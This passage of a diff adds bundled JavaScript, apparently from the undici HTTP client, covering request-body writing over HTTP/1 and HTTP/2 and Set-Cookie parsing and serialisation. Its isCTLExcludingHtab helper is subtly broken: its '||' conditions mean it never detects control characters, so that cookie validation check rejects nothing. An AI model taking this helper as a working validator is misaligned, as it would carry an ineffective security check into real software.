// TODO(HTTP/2): unref only if current streams count is 0 + if (h2State.openStreams === 0) { + session.unref() + } + }) + + stream.once('error', function (err) { + if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { + h2State.streams -= 1 + util.destroy(stream, err) + } + }) + + stream.once('frameError', (type, code) => { + const err = new 
InformationalError(`HTTP/2: "frameError" received - type ${type}, code ${code}`) + errorRequest(client, request, err) + + if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { + h2State.streams -= 1 + util.destroy(stream, err) + } + }) + + // stream.on('aborted', () => { + // // TODO(HTTP/2): Support aborted + // }) + + // stream.on('timeout', () => { + // // TODO(HTTP/2): Support timeout + // }) + + // stream.on('push', headers => { + // // TODO(HTTP/2): Suppor push + // }) + + // stream.on('trailers', headers => { + // // TODO(HTTP/2): Support trailers + // }) + + return true + + function writeBodyH2 () { + /* istanbul ignore else: assertion */ + if (!body) { + request.onRequestSent() + } else if (util.isBuffer(body)) { + assert(contentLength === body.byteLength, 'buffer body must have content length') + stream.cork() + stream.write(body) + stream.uncork() + stream.end() + request.onBodySent(body) + request.onRequestSent() + } else if (util.isBlobLike(body)) { + if (typeof body.stream === 'function') { + writeIterable({ + client, + request, + contentLength, + h2stream: stream, + expectsPayload, + body: body.stream(), + socket: client[kSocket], + header: '' + }) + } else { + writeBlob({ + body, + client, + request, + contentLength, + expectsPayload, + h2stream: stream, + header: '', + socket: client[kSocket] + }) + } + } else if (util.isStream(body)) { + writeStream({ + body, + client, + request, + contentLength, + expectsPayload, + socket: client[kSocket], + h2stream: stream, + header: '' + }) + } else if (util.isIterable(body)) { + writeIterable({ + body, + client, + request, + contentLength, + expectsPayload, + header: '', + h2stream: stream, + socket: client[kSocket] + }) + } else { + assert(false) + } + } +} + +function writeStream ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { + assert(contentLength !== 0 || client[kRunning] === 0, 'stream body cannot be pipelined') + + if 
(client[kHTTPConnVersion] === 'h2') { + // For HTTP/2, is enough to pipe the stream + const pipe = pipeline( + body, + h2stream, + (err) => { + if (err) { + util.destroy(body, err) + util.destroy(h2stream, err) + } else { + request.onRequestSent() + } + } + ) + + pipe.on('data', onPipeData) + pipe.once('end', () => { + pipe.removeListener('data', onPipeData) + util.destroy(pipe) + }) + + function onPipeData (chunk) { + request.onBodySent(chunk) + } + + return + } + + let finished = false + + const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) + + const onData = function (chunk) { + if (finished) { + return + } + + try { + if (!writer.write(chunk) && this.pause) { + this.pause() + } + } catch (err) { + util.destroy(this, err) + } + } + const onDrain = function () { + if (finished) { + return + } + + if (body.resume) { + body.resume() + } + } + const onAbort = function () { + if (finished) { + return + } + const err = new RequestAbortedError() + queueMicrotask(() => onFinished(err)) + } + const onFinished = function (err) { + if (finished) { + return + } + + finished = true + + assert(socket.destroyed || (socket[kWriting] && client[kRunning] <= 1)) + + socket + .off('drain', onDrain) + .off('error', onFinished) + + body + .removeListener('data', onData) + .removeListener('end', onFinished) + .removeListener('error', onFinished) + .removeListener('close', onAbort) + + if (!err) { + try { + writer.end() + } catch (er) { + err = er + } + } + + writer.destroy(err) + + if (err && (err.code !== 'UND_ERR_INFO' || err.message !== 'reset')) { + util.destroy(body, err) + } else { + util.destroy(body) + } + } + + body + .on('data', onData) + .on('end', onFinished) + .on('error', onFinished) + .on('close', onAbort) + + if (body.resume) { + body.resume() + } + + socket + .on('drain', onDrain) + .on('error', onFinished) +} + +async function writeBlob ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) 
{ + assert(contentLength === body.size, 'blob body must have content length') + + const isH2 = client[kHTTPConnVersion] === 'h2' + try { + if (contentLength != null && contentLength !== body.size) { + throw new RequestContentLengthMismatchError() + } + + const buffer = Buffer.from(await body.arrayBuffer()) + + if (isH2) { + h2stream.cork() + h2stream.write(buffer) + h2stream.uncork() + } else { + socket.cork() + socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') + socket.write(buffer) + socket.uncork() + } + + request.onBodySent(buffer) + request.onRequestSent() + + if (!expectsPayload) { + socket[kReset] = true + } + + resume(client) + } catch (err) { + util.destroy(isH2 ? h2stream : socket, err) + } +} + +async function writeIterable ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { + assert(contentLength !== 0 || client[kRunning] === 0, 'iterator body cannot be pipelined') + + let callback = null + function onDrain () { + if (callback) { + const cb = callback + callback = null + cb() + } + } + + const waitForDrain = () => new Promise((resolve, reject) => { + assert(callback === null) + + if (socket[kError]) { + reject(socket[kError]) + } else { + callback = resolve + } + }) + + if (client[kHTTPConnVersion] === 'h2') { + h2stream + .on('close', onDrain) + .on('drain', onDrain) + + try { + // It's up to the user to somehow abort the async iterable. 
+ for await (const chunk of body) { + if (socket[kError]) { + throw socket[kError] + } + + const res = h2stream.write(chunk) + request.onBodySent(chunk) + if (!res) { + await waitForDrain() + } + } + } catch (err) { + h2stream.destroy(err) + } finally { + request.onRequestSent() + h2stream.end() + h2stream + .off('close', onDrain) + .off('drain', onDrain) + } + + return + } + + socket + .on('close', onDrain) + .on('drain', onDrain) + + const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) + try { + // It's up to the user to somehow abort the async iterable. + for await (const chunk of body) { + if (socket[kError]) { + throw socket[kError] + } + + if (!writer.write(chunk)) { + await waitForDrain() + } + } + + writer.end() + } catch (err) { + writer.destroy(err) + } finally { + socket + .off('close', onDrain) + .off('drain', onDrain) + } +} + +class AsyncWriter { + constructor ({ socket, request, contentLength, client, expectsPayload, header }) { + this.socket = socket + this.request = request + this.contentLength = contentLength + this.client = client + this.bytesWritten = 0 + this.expectsPayload = expectsPayload + this.header = header + + socket[kWriting] = true + } + + write (chunk) { + const { socket, request, contentLength, client, bytesWritten, expectsPayload, header } = this + + if (socket[kError]) { + throw socket[kError] + } + + if (socket.destroyed) { + return false + } + + const len = Buffer.byteLength(chunk) + if (!len) { + return true + } + + // We should defer writing chunks. 
+ if (contentLength !== null && bytesWritten + len > contentLength) { + if (client[kStrictContentLength]) { + throw new RequestContentLengthMismatchError() + } + + process.emitWarning(new RequestContentLengthMismatchError()) + } + + socket.cork() + + if (bytesWritten === 0) { + if (!expectsPayload) { + socket[kReset] = true + } + + if (contentLength === null) { + socket.write(`${header}transfer-encoding: chunked\r\n`, 'latin1') + } else { + socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') + } + } + + if (contentLength === null) { + socket.write(`\r\n${len.toString(16)}\r\n`, 'latin1') + } + + this.bytesWritten += len + + const ret = socket.write(chunk) + + socket.uncork() + + request.onBodySent(chunk) + + if (!ret) { + if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { + // istanbul ignore else: only for jest + if (socket[kParser].timeout.refresh) { + socket[kParser].timeout.refresh() + } + } + } + + return ret + } + + end () { + const { socket, contentLength, client, bytesWritten, expectsPayload, header, request } = this + request.onRequestSent() + + socket[kWriting] = false + + if (socket[kError]) { + throw socket[kError] + } + + if (socket.destroyed) { + return + } + + if (bytesWritten === 0) { + if (expectsPayload) { + // https://tools.ietf.org/html/rfc7230#section-3.3.2 + // A user agent SHOULD send a Content-Length in a request message when + // no Transfer-Encoding is sent and the request method defines a meaning + // for an enclosed payload body. 
+ + socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') + } else { + socket.write(`${header}\r\n`, 'latin1') + } + } else if (contentLength === null) { + socket.write('\r\n0\r\n\r\n', 'latin1') + } + + if (contentLength !== null && bytesWritten !== contentLength) { + if (client[kStrictContentLength]) { + throw new RequestContentLengthMismatchError() + } else { + process.emitWarning(new RequestContentLengthMismatchError()) + } + } + + if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { + // istanbul ignore else: only for jest + if (socket[kParser].timeout.refresh) { + socket[kParser].timeout.refresh() + } + } + + resume(client) + } + + destroy (err) { + const { socket, client } = this + + socket[kWriting] = false + + if (err) { + assert(client[kRunning] <= 1, 'pipeline should only contain this request') + util.destroy(socket, err) + } + } +} + +function errorRequest (client, request, err) { + try { + request.onError(err) + assert(request.aborted) + } catch (err) { + client.emit('error', err) + } +} + +module.exports = Client + + +/***/ }), + +/***/ 6436: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +/* istanbul ignore file: only for Node 12 */ + +const { kConnected, kSize } = __nccwpck_require__(2785) + +class CompatWeakRef { + constructor (value) { + this.value = value + } + + deref () { + return this.value[kConnected] === 0 && this.value[kSize] === 0 + ? 
undefined + : this.value + } +} + +class CompatFinalizer { + constructor (finalizer) { + this.finalizer = finalizer + } + + register (dispatcher, key) { + if (dispatcher.on) { + dispatcher.on('disconnect', () => { + if (dispatcher[kConnected] === 0 && dispatcher[kSize] === 0) { + this.finalizer(key) + } + }) + } + } +} + +module.exports = function () { + // FIXME: remove workaround when the Node bug is fixed + // https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 + if (process.env.NODE_V8_COVERAGE) { + return { + WeakRef: CompatWeakRef, + FinalizationRegistry: CompatFinalizer + } + } + return { + WeakRef: global.WeakRef || CompatWeakRef, + FinalizationRegistry: global.FinalizationRegistry || CompatFinalizer + } +} + + +/***/ }), + +/***/ 663: +/***/ ((module) => { + +"use strict"; + + +// https://wicg.github.io/cookie-store/#cookie-maximum-attribute-value-size +const maxAttributeValueSize = 1024 + +// https://wicg.github.io/cookie-store/#cookie-maximum-name-value-pair-size +const maxNameValuePairSize = 4096 + +module.exports = { + maxAttributeValueSize, + maxNameValuePairSize +} + + +/***/ }), + +/***/ 1724: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { parseSetCookie } = __nccwpck_require__(4408) +const { stringify, getHeadersList } = __nccwpck_require__(3121) +const { webidl } = __nccwpck_require__(1744) +const { Headers } = __nccwpck_require__(554) + +/** + * @typedef {Object} Cookie + * @property {string} name + * @property {string} value + * @property {Date|number|undefined} expires + * @property {number|undefined} maxAge + * @property {string|undefined} domain + * @property {string|undefined} path + * @property {boolean|undefined} secure + * @property {boolean|undefined} httpOnly + * @property {'Strict'|'Lax'|'None'} sameSite + * @property {string[]} unparsed + */ + +/** + * @param {Headers} headers + * @returns {Record} + */ +function getCookies (headers) { + 
webidl.argumentLengthCheck(arguments, 1, { header: 'getCookies' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + const cookie = headers.get('cookie') + const out = {} + + if (!cookie) { + return out + } + + for (const piece of cookie.split(';')) { + const [name, ...value] = piece.split('=') + + out[name.trim()] = value.join('=') + } + + return out +} + +/** + * @param {Headers} headers + * @param {string} name + * @param {{ path?: string, domain?: string }|undefined} attributes + * @returns {void} + */ +function deleteCookie (headers, name, attributes) { + webidl.argumentLengthCheck(arguments, 2, { header: 'deleteCookie' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + name = webidl.converters.DOMString(name) + attributes = webidl.converters.DeleteCookieAttributes(attributes) + + // Matches behavior of + // https://github.com/denoland/deno_std/blob/63827b16330b82489a04614027c33b7904e08be5/http/cookie.ts#L278 + setCookie(headers, { + name, + value: '', + expires: new Date(0), + ...attributes + }) +} + +/** + * @param {Headers} headers + * @returns {Cookie[]} + */ +function getSetCookies (headers) { + webidl.argumentLengthCheck(arguments, 1, { header: 'getSetCookies' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + const cookies = getHeadersList(headers).cookies + + if (!cookies) { + return [] + } + + // In older versions of undici, cookies is a list of name:value. + return cookies.map((pair) => parseSetCookie(Array.isArray(pair) ? 
pair[1] : pair)) +} + +/** + * @param {Headers} headers + * @param {Cookie} cookie + * @returns {void} + */ +function setCookie (headers, cookie) { + webidl.argumentLengthCheck(arguments, 2, { header: 'setCookie' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + cookie = webidl.converters.Cookie(cookie) + + const str = stringify(cookie) + + if (str) { + headers.append('Set-Cookie', stringify(cookie)) + } +} + +webidl.converters.DeleteCookieAttributes = webidl.dictionaryConverter([ + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'path', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'domain', + defaultValue: null + } +]) + +webidl.converters.Cookie = webidl.dictionaryConverter([ + { + converter: webidl.converters.DOMString, + key: 'name' + }, + { + converter: webidl.converters.DOMString, + key: 'value' + }, + { + converter: webidl.nullableConverter((value) => { + if (typeof value === 'number') { + return webidl.converters['unsigned long long'](value) + } + + return new Date(value) + }), + key: 'expires', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters['long long']), + key: 'maxAge', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'domain', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'path', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.boolean), + key: 'secure', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.boolean), + key: 'httpOnly', + defaultValue: null + }, + { + converter: webidl.converters.USVString, + key: 'sameSite', + allowedValues: ['Strict', 'Lax', 'None'] + }, + { + converter: webidl.sequenceConverter(webidl.converters.DOMString), + key: 'unparsed', + defaultValue: [] + } +]) + +module.exports = { + getCookies, + 
deleteCookie, + getSetCookies, + setCookie +} + + +/***/ }), + +/***/ 4408: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { maxNameValuePairSize, maxAttributeValueSize } = __nccwpck_require__(663) +const { isCTLExcludingHtab } = __nccwpck_require__(3121) +const { collectASequenceOfCodePointsFast } = __nccwpck_require__(685) +const assert = __nccwpck_require__(9491) + +/** + * @description Parses the field-value attributes of a set-cookie header string. + * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 + * @param {string} header + * @returns if the header is invalid, null will be returned + */ +function parseSetCookie (header) { + // 1. If the set-cookie-string contains a %x00-08 / %x0A-1F / %x7F + // character (CTL characters excluding HTAB): Abort these steps and + // ignore the set-cookie-string entirely. + if (isCTLExcludingHtab(header)) { + return null + } + + let nameValuePair = '' + let unparsedAttributes = '' + let name = '' + let value = '' + + // 2. If the set-cookie-string contains a %x3B (";") character: + if (header.includes(';')) { + // 1. The name-value-pair string consists of the characters up to, + // but not including, the first %x3B (";"), and the unparsed- + // attributes consist of the remainder of the set-cookie-string + // (including the %x3B (";") in question). + const position = { position: 0 } + + nameValuePair = collectASequenceOfCodePointsFast(';', header, position) + unparsedAttributes = header.slice(position.position) + } else { + // Otherwise: + + // 1. The name-value-pair string consists of all the characters + // contained in the set-cookie-string, and the unparsed- + // attributes is the empty string. + nameValuePair = header + } + + // 3. If the name-value-pair string lacks a %x3D ("=") character, then + // the name string is empty, and the value string is the value of + // name-value-pair. 
+ if (!nameValuePair.includes('=')) { + value = nameValuePair + } else { + // Otherwise, the name string consists of the characters up to, but + // not including, the first %x3D ("=") character, and the (possibly + // empty) value string consists of the characters after the first + // %x3D ("=") character. + const position = { position: 0 } + name = collectASequenceOfCodePointsFast( + '=', + nameValuePair, + position + ) + value = nameValuePair.slice(position.position + 1) + } + + // 4. Remove any leading or trailing WSP characters from the name + // string and the value string. + name = name.trim() + value = value.trim() + + // 5. If the sum of the lengths of the name string and the value string + // is more than 4096 octets, abort these steps and ignore the set- + // cookie-string entirely. + if (name.length + value.length > maxNameValuePairSize) { + return null + } + + // 6. The cookie-name is the name string, and the cookie-value is the + // value string. + return { + name, value, ...parseUnparsedAttributes(unparsedAttributes) + } +} + +/** + * Parses the remaining attributes of a set-cookie header + * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 + * @param {string} unparsedAttributes + * @param {[Object.]={}} cookieAttributeList + */ +function parseUnparsedAttributes (unparsedAttributes, cookieAttributeList = {}) { + // 1. If the unparsed-attributes string is empty, skip the rest of + // these steps. + if (unparsedAttributes.length === 0) { + return cookieAttributeList + } + + // 2. Discard the first character of the unparsed-attributes (which + // will be a %x3B (";") character). + assert(unparsedAttributes[0] === ';') + unparsedAttributes = unparsedAttributes.slice(1) + + let cookieAv = '' + + // 3. If the remaining unparsed-attributes contains a %x3B (";") + // character: + if (unparsedAttributes.includes(';')) { + // 1. 
Consume the characters of the unparsed-attributes up to, but + // not including, the first %x3B (";") character. + cookieAv = collectASequenceOfCodePointsFast( + ';', + unparsedAttributes, + { position: 0 } + ) + unparsedAttributes = unparsedAttributes.slice(cookieAv.length) + } else { + // Otherwise: + + // 1. Consume the remainder of the unparsed-attributes. + cookieAv = unparsedAttributes + unparsedAttributes = '' + } + + // Let the cookie-av string be the characters consumed in this step. + + let attributeName = '' + let attributeValue = '' + + // 4. If the cookie-av string contains a %x3D ("=") character: + if (cookieAv.includes('=')) { + // 1. The (possibly empty) attribute-name string consists of the + // characters up to, but not including, the first %x3D ("=") + // character, and the (possibly empty) attribute-value string + // consists of the characters after the first %x3D ("=") + // character. + const position = { position: 0 } + + attributeName = collectASequenceOfCodePointsFast( + '=', + cookieAv, + position + ) + attributeValue = cookieAv.slice(position.position + 1) + } else { + // Otherwise: + + // 1. The attribute-name string consists of the entire cookie-av + // string, and the attribute-value string is empty. + attributeName = cookieAv + } + + // 5. Remove any leading or trailing WSP characters from the attribute- + // name string and the attribute-value string. + attributeName = attributeName.trim() + attributeValue = attributeValue.trim() + + // 6. If the attribute-value is longer than 1024 octets, ignore the + // cookie-av string and return to Step 1 of this algorithm. + if (attributeValue.length > maxAttributeValueSize) { + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) + } + + // 7. Process the attribute-name and attribute-value according to the + // requirements in the following subsections. (Notice that + // attributes with unrecognized attribute-names are ignored.) 
+ const attributeNameLowercase = attributeName.toLowerCase() + + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.1 + // If the attribute-name case-insensitively matches the string + // "Expires", the user agent MUST process the cookie-av as follows. + if (attributeNameLowercase === 'expires') { + // 1. Let the expiry-time be the result of parsing the attribute-value + // as cookie-date (see Section 5.1.1). + const expiryTime = new Date(attributeValue) + + // 2. If the attribute-value failed to parse as a cookie date, ignore + // the cookie-av. + + cookieAttributeList.expires = expiryTime + } else if (attributeNameLowercase === 'max-age') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.2 + // If the attribute-name case-insensitively matches the string "Max- + // Age", the user agent MUST process the cookie-av as follows. + + // 1. If the first character of the attribute-value is not a DIGIT or a + // "-" character, ignore the cookie-av. + const charCode = attributeValue.charCodeAt(0) + + if ((charCode < 48 || charCode > 57) && attributeValue[0] !== '-') { + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) + } + + // 2. If the remainder of attribute-value contains a non-DIGIT + // character, ignore the cookie-av. + if (!/^\d+$/.test(attributeValue)) { + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) + } + + // 3. Let delta-seconds be the attribute-value converted to an integer. + const deltaSeconds = Number(attributeValue) + + // 4. Let cookie-age-limit be the maximum age of the cookie (which + // SHOULD be 400 days or less, see Section 4.1.2.2). + + // 5. Set delta-seconds to the smaller of its present value and cookie- + // age-limit. + // deltaSeconds = Math.min(deltaSeconds * 1000, maxExpiresMs) + + // 6. If delta-seconds is less than or equal to zero (0), let expiry- + // time be the earliest representable date and time. 
Otherwise, let + // the expiry-time be the current date and time plus delta-seconds + // seconds. + // const expiryTime = deltaSeconds <= 0 ? Date.now() : Date.now() + deltaSeconds + + // 7. Append an attribute to the cookie-attribute-list with an + // attribute-name of Max-Age and an attribute-value of expiry-time. + cookieAttributeList.maxAge = deltaSeconds + } else if (attributeNameLowercase === 'domain') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.3 + // If the attribute-name case-insensitively matches the string "Domain", + // the user agent MUST process the cookie-av as follows. + + // 1. Let cookie-domain be the attribute-value. + let cookieDomain = attributeValue + + // 2. If cookie-domain starts with %x2E ("."), let cookie-domain be + // cookie-domain without its leading %x2E ("."). + if (cookieDomain[0] === '.') { + cookieDomain = cookieDomain.slice(1) + } + + // 3. Convert the cookie-domain to lower case. + cookieDomain = cookieDomain.toLowerCase() + + // 4. Append an attribute to the cookie-attribute-list with an + // attribute-name of Domain and an attribute-value of cookie-domain. + cookieAttributeList.domain = cookieDomain + } else if (attributeNameLowercase === 'path') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.4 + // If the attribute-name case-insensitively matches the string "Path", + // the user agent MUST process the cookie-av as follows. + + // 1. If the attribute-value is empty or if the first character of the + // attribute-value is not %x2F ("/"): + let cookiePath = '' + if (attributeValue.length === 0 || attributeValue[0] !== '/') { + // 1. Let cookie-path be the default-path. + cookiePath = '/' + } else { + // Otherwise: + + // 1. Let cookie-path be the attribute-value. + cookiePath = attributeValue + } + + // 2. Append an attribute to the cookie-attribute-list with an + // attribute-name of Path and an attribute-value of cookie-path. 
+ cookieAttributeList.path = cookiePath + } else if (attributeNameLowercase === 'secure') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.5 + // If the attribute-name case-insensitively matches the string "Secure", + // the user agent MUST append an attribute to the cookie-attribute-list + // with an attribute-name of Secure and an empty attribute-value. + + cookieAttributeList.secure = true + } else if (attributeNameLowercase === 'httponly') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.6 + // If the attribute-name case-insensitively matches the string + // "HttpOnly", the user agent MUST append an attribute to the cookie- + // attribute-list with an attribute-name of HttpOnly and an empty + // attribute-value. + + cookieAttributeList.httpOnly = true + } else if (attributeNameLowercase === 'samesite') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.7 + // If the attribute-name case-insensitively matches the string + // "SameSite", the user agent MUST process the cookie-av as follows: + + // 1. Let enforcement be "Default". + let enforcement = 'Default' + + const attributeValueLowercase = attributeValue.toLowerCase() + // 2. If cookie-av's attribute-value is a case-insensitive match for + // "None", set enforcement to "None". + if (attributeValueLowercase.includes('none')) { + enforcement = 'None' + } + + // 3. If cookie-av's attribute-value is a case-insensitive match for + // "Strict", set enforcement to "Strict". + if (attributeValueLowercase.includes('strict')) { + enforcement = 'Strict' + } + + // 4. If cookie-av's attribute-value is a case-insensitive match for + // "Lax", set enforcement to "Lax". + if (attributeValueLowercase.includes('lax')) { + enforcement = 'Lax' + } + + // 5. Append an attribute to the cookie-attribute-list with an + // attribute-name of "SameSite" and an attribute-value of + // enforcement. 
+ cookieAttributeList.sameSite = enforcement + } else { + cookieAttributeList.unparsed ??= [] + + cookieAttributeList.unparsed.push(`${attributeName}=${attributeValue}`) + } + + // 8. Return to Step 1 of this algorithm. + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) +} + +module.exports = { + parseSetCookie, + parseUnparsedAttributes +} + + +/***/ }), + +/***/ 3121: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const assert = __nccwpck_require__(9491) +const { kHeadersList } = __nccwpck_require__(2785) + +function isCTLExcludingHtab (value) { + if (value.length === 0) { + return false + } + + for (const char of value) { + const code = char.charCodeAt(0) + + if ( + (code >= 0x00 || code <= 0x08) || + (code >= 0x0A || code <= 0x1F) || + code === 0x7F + ) { + return false + } + } +} + +/** + CHAR = + token = 1* + separators = "(" | ")" | "<" | ">" | "@" + | "," | ";" | ":" | "\" | <"> + | "/" | "[" | "]" | "?" | "=" + | "{" | "}" | SP | HT + * @param {string} name + */ +function validateCookieName (name) { + for (const char of name) { + const code = char.charCodeAt(0) + + if ( + (code <= 0x20 || code > 0x7F) || + char === '(' || + char === ')' || + char === '>' || + char === '<' || + char === '@' || + char === ',' || + char === ';' || + char === ':' || + char === '\\' || + char === '"' || + char === '/' || + char === '[' || + char === ']' || + char === '?' 
|| + char === '=' || + char === '{' || + char === '}' + ) { + throw new Error('Invalid cookie name') + } + } +} + +/** + cookie-value = *cookie-octet / ( DQUOTE *cookie-octet DQUOTE ) + cookie-octet = %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E + ; US-ASCII characters excluding CTLs, + ; whitespace DQUOTE, comma, semicolon, + ; and backslash + * @param {string} value + */ +function validateCookieValue (value) { + for (const char of value) { + const code = char.charCodeAt(0) + + if ( + code < 0x21 || // exclude CTLs (0-31) + code === 0x22 || + code === 0x2C || + code === 0x3B || + code === 0x5C || + code > 0x7E // non-ascii + ) { + throw new Error('Invalid header value') + } + } +} + +/** + * path-value = + * @param {string} path + */ +function validateCookiePath (path) { + for (const char of path) { + const code = char.charCodeAt(0) + + if (code < 0x21 || char === ';') { + throw new Error('Invalid cookie path') + } + } +} + +/** + * I have no idea why these values aren't allowed to be honest, + * but Deno tests these. 
- Khafra + * @param {string} domain + */ +function validateCookieDomain (domain) { + if ( + domain.startsWith('-') || + domain.endsWith('.') || + domain.endsWith('-') + ) { + throw new Error('Invalid cookie domain') + } +} + +/** + * @see https://www.rfc-editor.org/rfc/rfc7231#section-7.1.1.1 + * @param {number|Date} date + IMF-fixdate = day-name "," SP date1 SP time-of-day SP GMT + ; fixed length/zone/capitalization subset of the format + ; see Section 3.3 of [RFC5322] + + day-name = %x4D.6F.6E ; "Mon", case-sensitive + / %x54.75.65 ; "Tue", case-sensitive + / %x57.65.64 ; "Wed", case-sensitive + / %x54.68.75 ; "Thu", case-sensitive + / %x46.72.69 ; "Fri", case-sensitive + / %x53.61.74 ; "Sat", case-sensitive + / %x53.75.6E ; "Sun", case-sensitive + date1 = day SP month SP year + ; e.g., 02 Jun 1982 + + day = 2DIGIT + month = %x4A.61.6E ; "Jan", case-sensitive + / %x46.65.62 ; "Feb", case-sensitive + / %x4D.61.72 ; "Mar", case-sensitive + / %x41.70.72 ; "Apr", case-sensitive + / %x4D.61.79 ; "May", case-sensitive + / %x4A.75.6E ; "Jun", case-sensitive + / %x4A.75.6C ; "Jul", case-sensitive + / %x41.75.67 ; "Aug", case-sensitive + / %x53.65.70 ; "Sep", case-sensitive + / %x4F.63.74 ; "Oct", case-sensitive + / %x4E.6F.76 ; "Nov", case-sensitive + / %x44.65.63 ; "Dec", case-sensitive + year = 4DIGIT + + GMT = %x47.4D.54 ; "GMT", case-sensitive + + time-of-day = hour ":" minute ":" second + ; 00:00:00 - 23:59:60 (leap second) + + hour = 2DIGIT + minute = 2DIGIT + second = 2DIGIT + */ +function toIMFDate (date) { + if (typeof date === 'number') { + date = new Date(date) + } + + const days = [ + 'Sun', 'Mon', 'Tue', 'Wed', + 'Thu', 'Fri', 'Sat' + ] + + const months = [ + 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', + 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec' + ] + + const dayName = days[date.getUTCDay()] + const day = date.getUTCDate().toString().padStart(2, '0') + const month = months[date.getUTCMonth()] + const year = date.getUTCFullYear() + const hour = 
date.getUTCHours().toString().padStart(2, '0') + const minute = date.getUTCMinutes().toString().padStart(2, '0') + const second = date.getUTCSeconds().toString().padStart(2, '0') + + return `${dayName}, ${day} ${month} ${year} ${hour}:${minute}:${second} GMT` +} + +/** + max-age-av = "Max-Age=" non-zero-digit *DIGIT + ; In practice, both expires-av and max-age-av + ; are limited to dates representable by the + ; user agent. + * @param {number} maxAge + */ +function validateCookieMaxAge (maxAge) { + if (maxAge < 0) { + throw new Error('Invalid cookie max-age') + } +} + +/** + * @see https://www.rfc-editor.org/rfc/rfc6265#section-4.1.1 + * @param {import('./index').Cookie} cookie + */ +function stringify (cookie) { + if (cookie.name.length === 0) { + return null + } + + validateCookieName(cookie.name) + validateCookieValue(cookie.value) + + const out = [`${cookie.name}=${cookie.value}`] + + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.1 + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.2 + if (cookie.name.startsWith('__Secure-')) { + cookie.secure = true + } + + if (cookie.name.startsWith('__Host-')) { + cookie.secure = true + cookie.domain = null + cookie.path = '/' + } + + if (cookie.secure) { + out.push('Secure') + } + + if (cookie.httpOnly) { + out.push('HttpOnly') + } + + if (typeof cookie.maxAge === 'number') { + validateCookieMaxAge(cookie.maxAge) + out.push(`Max-Age=${cookie.maxAge}`) + } + + if (cookie.domain) { + validateCookieDomain(cookie.domain) + out.push(`Domain=${cookie.domain}`) + } + + if (cookie.path) { + validateCookiePath(cookie.path) + out.push(`Path=${cookie.path}`) + } + + if (cookie.expires && cookie.expires.toString() !== 'Invalid Date') { + out.push(`Expires=${toIMFDate(cookie.expires)}`) + } + + if (cookie.sameSite) { + out.push(`SameSite=${cookie.sameSite}`) + } + + for (const part of cookie.unparsed) { + if (!part.includes('=')) { + throw new 
